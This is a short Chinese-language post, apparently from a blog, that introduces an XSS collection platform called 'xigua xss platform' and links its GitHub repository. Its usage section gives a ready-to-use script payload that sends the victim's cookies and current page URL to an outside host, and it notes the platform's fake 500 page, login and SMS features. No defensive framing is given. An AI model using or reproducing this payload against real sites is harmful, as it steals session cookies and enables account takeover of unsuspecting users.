Back

security - XSS 平台: xigua xss platform

发布时间: 2021-11-20 01:54:00

地址;  
https://github.com/sg552/xigua_xss_platform
使用方法:
<script>var d=document;var i=d.createElement("img");i.src="http://b.c01.ca/x?c="+d.cookie+'&l='+d.location.href;d.body.appendChild(i)+"&debug=true"</script>
访问:
列表:
有登录功能。
默认页面是 一个假的 500 页面:
可以登录:
支持短信:

Back